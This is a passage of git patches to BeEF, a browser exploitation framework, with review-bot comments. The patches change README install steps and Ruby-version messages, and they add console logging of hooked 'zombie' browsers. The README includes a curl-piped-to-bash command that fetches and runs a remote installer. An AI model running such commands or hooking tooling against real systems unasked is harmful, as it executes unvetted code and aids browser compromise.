4 deletions(-) diff --git a/README b/README index 7ed98f998..38a31d15e 100644 --- a/README +++ b/README @@ -53,8 +53,13 @@ Most of the contents of this file will eventually be added to /install.rb. In th 4. Prerequisites (Mac OSX) - Make sure you have XCode installed - which provided the sqlite support BeEF needs - Sqlite support is native in MacOS 10.6+ + - XCode: provides the sqlite support BeEF needs + + - Ruby 1.9 + To install RVM and Ruby 1.9.3 on Mac OS: + $ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile + $ rvm install 1.9.3-p0 --with-gcc=clang + $ rvm use 1.9.3 5. Install instructions diff --git a/beef b/beef index fe37f45af..f55a3a8c4 100755 --- a/beef +++ b/beef 
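Review bot: The new `:dmg` task shells out for every file operation and does not tolerate a previous run: `sh "mkdir dmg"` aborts if the directory is left over, and if `hdiutil` fails the `rm -r dmg` cleanup never runs. Rake already exposes FileUtils (`mkdir_p`, `rm_rf`, `ln_s`), so the task can be written without the trailing semicolons and with a `begin`/`ensure` so the scratch directory is always removed. `rsync *` also skips dot-files because of shell globbing; if that is intentional a comment should say so.
```ruby
task :dmg do
  begin
    puts "\nCreating Working Directory\n"
    rm_rf "dmg"                      # tolerate leftovers from an aborted run
    mkdir_p "dmg/BeEF"
    sh "rsync * dmg/BeEF --exclude=dmg -r"
    ln_s "/Applications", "dmg/Applications"
    # … unchanged: hdiutil create …
  ensure
    puts "\nCleaning Up\n"
    rm_rf "dmg"
  end
  puts "\nBeEF.dmg created\n"
end
```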
@@ -24,7 +24,7 @@ if RUBY_VERSION < '1.9' puts "\n" puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later." puts "OSX:" - puts "sudo port install ruby19 +nosuffix" + puts "See Readme" puts "\n" exit end diff --git a/install b/install index e7039844b..b0165bde0 100755 --- a/install +++ b/install @@ -23,7 +23,7 @@ if RUBY_VERSION < '1.9' puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later." puts "" puts "OSX:" - puts "sudo port install ruby19 +nosuffix" + puts "See README" puts "\n" exit end From 2715e0400cf72bbd183d79815f4a51edbb1331c3 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 15:05:45 +0100 Subject: [PATCH 16/16] added browser type,version and OS to console output when a new browser is hooked in BeEF --- extensions/initialization/handler.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/extensions/initialization/handler.rb b/extensions/initialization/handler.rb index bcd16bf50..c6dd1d66b 100644 --- a/extensions/initialization/handler.rb +++ b/extensions/initialization/handler.rb @@ -81,7 +81,6 @@ module BeEF # add a log entry for the newly hooked browser BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}") - # get and store browser name browser_name = get_param(@data['results'], 'BrowserName') if BeEF::Filters.is_valid_browsername?(browser_name) @@ -274,6 +273,10 @@ module BeEF self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection." end + # log a few info of newly hooked zombie in the console + print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" + + # Call autorun modules autorun = [] BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
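Review bot: The replacement string differs between the two files, `puts "See Readme"` in `beef` and `puts "See README"` in `install`, while the file the user is sent to is named `README` in this repository. Using the exact filename in both, `puts "See README"`, keeps the two messages identical and searchable. Both `if RUBY_VERSION < '1.9'` blocks start outside their hunks.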
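Review bot: The new `print_info` line in the second handler.rb hunk writes `browser_name`, `browser_version` and `os_name` to the console as received from the hooked browser; the first hunk shows `browser_name` is assigned before `BeEF::Filters.is_valid_browsername?` is checked, so a value that fails validation can still be printed. The other two values are presumably validated outside the hunk in the same pattern. Console output built from client-supplied strings can carry terminal control sequences, so either emit the line only after all three checks have passed, or pass the values through `.inspect` before interpolation so control characters are escaped. The handling method starts and ends outside both hunks.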